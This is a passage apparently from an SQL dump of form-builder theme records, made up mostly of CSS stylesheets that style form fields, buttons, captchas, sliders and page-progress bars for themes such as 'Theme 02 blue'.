margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/10/02/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\ncolor: #FFF;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 38px;\r\nline-height: 35px;\r\nbackground:url([SITE_ROOT]/images/10/next.png) no-repeat right #000;\r\npadding: 0px 36px 0 20px;\r\nvertical-align: middle;\r\nfont-size: 18px;\r\nborder-top-right-radius: 7px;\r\nborder-bottom-right-radius: 7px;\r\n}\r\n.previous-page div.wdform-page-button {\r\ncolor: #A2A2A2;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 37px;\r\nline-height: 35px;\r\nbackground:url([SITE_ROOT]/images/09/previous.png) no-repeat left #F1F1F1;\r\npadding: 0 20px 0 36px;\r\nvertical-align: middle;\r\nfont-size: 18px;\r\nborder-top-left-radius: 7px;\r\nborder-bottom-left-radius: 7px;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #000;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n		border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: transparent;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #000;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 10px 40px 0px;\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #000;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	padding: 2px;\r\n	height: 26px;\r\n	border: 1px solid #B7B7B7;\r\nbackground: #F8F8F8;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type="text"]:focus{\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\nselect {\r\n	outline: none;\r\n}\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n\r\n\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n\r\n\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #8A8A8A;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\ncolor: #000;\r\nbackground-color: #FFF;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 29px;\r\ntext-align: center;\r\nvertical-align: bottom;\r\npadding: 5px 25px 0px 25px;\r\nfont-size: 16px;\r\nfont-weight:bold;\r\n}\r\n.page_active {\r\ncolor: #FFF;\r\ncursor: pointer;\r\nbackground-color: #000;\r\ndisplay: inline-block;\r\nvertical-align: bottom;\r\nheight: 29px;\r\ntext-align: center;\r\nfont-size: 20px;\r\npadding: 5px 25px 0px 25px;\r\nline-height: 26px;\r\nfont-weight:bold;\r\n}\r\n.page_percentage_active {\r\npadding: 0px;\r\nmargin: 0px;\r\nborder-spacing: 0px;\r\nheight: 16px;\r\nline-height: 16px;\r\nfont-size: 15px;\r\nfloat: left;\r\ntext-align: right !important;\r\nz-index: 1;\r\nposition: relative;\r\nvertical-align: middle;\r\nbackground: #000;\r\ncolor: #fff;\r\nborder-top-left-radius: 5px;\r\nborder-bottom-left-radius: 5px;\r\n}\r\n.page_percentage_deactive {\r\nheight: 16px;\r\nline-height: 16px;\r\nbackground-color: #F1F1F1;\r\ntext-align: left !important;\r\nmargin-bottom: 1px;\r\nborder-radius: 5px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n}\r\n\r\n.wdform_percentage_text {\r\nmargin: 3px 5px 3px 9px;\r\ncolor: #FFF;\r\nfont-size: 12px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #6E6E6E;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 27px;\r\n	height: 27px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}', 0),
(5, 'Theme 02 blue', '.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #ADC0DB;\r\nmargin-bottom: 10px;\r\ncolor: #ADC0DB;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 10px;\r\n	border: 2px solid #fff;\r\n	background: #A4A4A4;\r\n}\r\n.ui-slider-range {\r\n	background: #A4A4A4 !important;\r\n}\r\n.ui-slider-horizontal .ui-slider-handle {\r\n	top: -8px !important;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 10px;\r\n	border: 2px solid #fff;\r\n	background: #A4A4A4;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n	content: url([SITE_ROOT]/images/02/bg.png);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #285485!important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #285485!important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #285485!important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #285485!important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #285485!important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #285485!important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-state-hover {\r\n	background: #285485!important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-slider {\r\n	background: #fff !important;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 4px;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 22px;\r\n	width: 29px;\r\n	background: url([SITE_ROOT]/images/02/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/02/01/upload.png);\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #285485;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 33px;\r\n	background: url([SITE_ROOT]/images/02/01/next.png) top right #708EB4;\r\n	padding: 0px 30px 0 15px;\r\n	vertical-align: middle;\r\n	font-weight: 600;\r\n	font-size: 16px;\r\n}\r\n .next-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/02/01/next.png) top right #144077;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #285485;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 36px;\r\n	background: url([SITE_ROOT]/images/02/01/previous.png) top left #708EB4;\r\n	padding: 0px 15px 0 30px;\r\n	vertical-align: middle;\r\n	font-weight: 600;\r\n	font-size: 16px;\r\n}\r\n .previous-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/02/01/previous.png) top left #144077;\r\n}\r\n.button-submit {\r\n	background: url([SITE_ROOT]/images/02/bg.png) #708EB4;\r\n	cursor: pointer;\r\n	font-size: 16px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #285485;\r\n	margin: 5px;\r\n	border: 0px;\r\n	font-family: Segoe UI;\r\n	font-weight: 600;\r\n}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	font-family: Segoe UI;\r\n	text-decoration: underline;\r\n}\r\n.wdform_page {\r\n	background: #ADC0DB;\r\n	padding: 15px 15px 15px 50px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 1px solid #C5C5C5;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: url([SITE_ROOT]/images/02/bg.png) #708EB4;\r\n	text-align: left;\r\n	padding: 10px;\r\n	border-radius: 0px;\r\n	-moz-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	-webkit-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	width: 466px;\r\n	text-align: center;\r\nfont-size:18px;\r\nfont-family: Segoe UI;\r\ncolor:#0E3F76;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\nmargin: 16px 10px 16px 0px;\r\ntext-align: left;\r\nfont-size: 18px;\r\nfont-family: Segoe UI;\r\ncolor:#0E3F76;\r\n}\r\n.wdform_section {\r\n	display: table-row\r\n}\r\nselect {\r\n	border-radius: 4px;\r\n	height: 26px;\r\n	overflow: hidden;\r\n	border: 0px solid #ccc;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type="text"] {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="password"] {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="text"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/02/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/02/01/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n} \r\n.wdform-calendar-button:focus {\r\n outline:none; \r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 11px;\r\n	height: 10px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 1px;\r\n	left: 1px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: rgb(158, 0, 0);\r\n	vertical-align: top;\r\nfloat:left;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 4px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n	color: #2564A3;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 30px 0px 30px;\r\n	font-weight: bold;\r\n}\r\n.page_deactive:nth-child(even) {\r\n	background-color: #DCDADB;\r\n}\r\n.page_deactive:nth-child(odd) {\r\n	background-color: #D1CDCE;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #0E3F77;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 18px;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 17px;\r\n	line-height: 17px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #0e3f77; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #0e3f77 0%, #0f437d 49%, #2f72b5 84%, #165ba9 99%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #0e3f77), color-stop(49%, #0f437d), color-stop(84%, #2f72b5), color-stop(99%, #165ba9)); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #0e3f77 0%, #0f437d 49%, #2f72b5 84%, #165ba9 99%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #0e3f77 0%, #0f437d 49%, #2f72b5 84%, #165ba9 99%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #0e3f77 0%, #0f437d 49%, #2f72b5 84%, #165ba9 99%); /* IE10+ */\r\n	background: linear-gradient(to right, #0e3f77 0%, #0f437d 49%, #2f72b5 84%, #165ba9 99%); /* W3C */\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 17px;\r\n	line-height: 17px;\r\n	background-color: #CCCCCC;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 